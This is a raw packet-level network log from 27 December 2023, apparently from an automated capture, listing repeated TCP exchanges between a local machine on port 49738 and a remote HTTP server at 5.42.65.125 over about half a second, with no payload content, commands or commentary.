Dec 27, 2023 17:57:24.442636967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.450371981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.450390100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.450453997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.457921028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.458022118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.458081961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.465521097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.465537071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.465595961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.473170042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.473186970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.473237991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.480374098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.480391979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.480458021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.487790108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.487807035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.487849951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.495070934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.495091915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.495140076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.502012968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.502028942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.502070904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.509180069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.509195089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.509246111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.516124964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.516141891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.516200066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.523102045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.523147106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.523215055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.528243065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.528259993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.528356075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.533418894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.533436060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.533488989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.538739920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.538753986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.538821936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.543735027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.543750048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.543800116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.548752069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.548767090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.548835039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.553706884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.553721905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.553772926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.558499098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.558514118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.558589935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.563647985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.563663960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.563714981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.568099976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.568115950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.568165064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.572810888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.572827101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.572884083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.577971935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.578025103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.578180075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.582005024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.582045078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.582108974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.586393118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.586407900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.586466074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.590843916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.590960026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.591031075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.595136881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.595153093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.595196962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.599426985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.599441051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.599490881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.603562117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.603576899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.603653908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.607736111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.607750893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.607949018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.611982107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.611996889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.612066031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.615936041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.615950108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.616002083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.619968891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.619983912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.620028019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.623992920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.624006033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.624057055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.628736973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.628751993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.628803015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.631755114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.631767988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.631822109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.635648012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.635663033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.635704994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.639458895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.639472961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.639523983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.643326044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.643341064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.643383026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.647150040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.647166014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.647214890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.652409077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.652463913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.652533054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.654441118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.654455900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.654524088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.658214092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.658229113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.658360958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.661637068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.661660910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.661720037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.665249109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.665272951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.665328026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.668754101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.668788910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.668865919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.672314882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.672333002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.672386885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.675792933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.675831079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.675911903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.679272890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.679287910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.679717064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.682740927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.682754993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.682811975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.686213017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.686232090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.686284065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.689627886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.689706087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.689758062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.693005085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.693018913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.693145037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.696459055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.696474075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.696542025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.699750900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.699800968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.699865103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.703923941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.703938007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.704003096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.706499100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.706561089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.706625938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.709758043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.709822893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.710712910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.713077068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.713090897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.713150978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.716183901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.716197968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.716274023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.719455957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.719470978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.719521046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.722559929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.722639084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.722711086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.725789070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.725832939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.725883961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.728868008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.728885889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.728931904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.732038975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.732063055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.732110023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.735086918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.735102892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.735161066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.738198996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.738214970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.738291025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.741286039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.741301060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.741355896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.744193077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.744206905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.744261026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.747344017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.747358084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.747410059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.750241041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.750257015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.750319958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.753210068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.753225088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.753278971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.756172895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.756239891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.756289005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.759126902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.759140968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.759193897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.762028933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.762042046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.762106895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.764955997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.764971018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.765193939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.767878056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.767891884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.767942905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.770715952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.770785093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.770999908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.773521900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.773535013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.773592949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.776284933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.776299953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.776345968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.779099941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.779114008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.779162884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.781754017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.781790018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.781837940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.784531116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.784547091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.784704924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.787297964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.787312031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.787368059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.789990902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.790005922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.790043116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.792602062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.792650938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.792706013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.795310020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.795325041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.795368910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.798152924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.798167944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.798219919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.800977945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.801063061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.801117897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.803481102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.803519964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.803569078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.805917025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.805932999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.805978060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.808377028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.808393955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.808451891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.810920000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.810934067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.811003923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.813519001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.813559055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.813606977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.816051960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.816072941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.816137075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.818583965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.818603992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.818669081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.821064949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.821080923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.821131945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.823450089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.823472977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.823533058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.826137066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.826152086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.826210976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.828344107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.828356981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.828414917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.830840111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.830853939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.830914021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.833199024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.833214998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.833271980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.835485935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.835500002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.835552931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.837960958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.837979078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.838031054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.840205908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.840221882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.840301991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.842590094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.842605114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.842664003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.844866037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.844882011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.844930887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.847214937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.847229004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.847282887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.849467993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.849481106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.849541903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.851722956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.851741076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.851795912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.853986979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.854001999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.854059935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.856378078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.856420040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.856475115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.858470917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.858485937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.858546972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:24.860651970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.860677004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:24.860735893 CET	49738	80	192.168.2.4	5.42.65.125
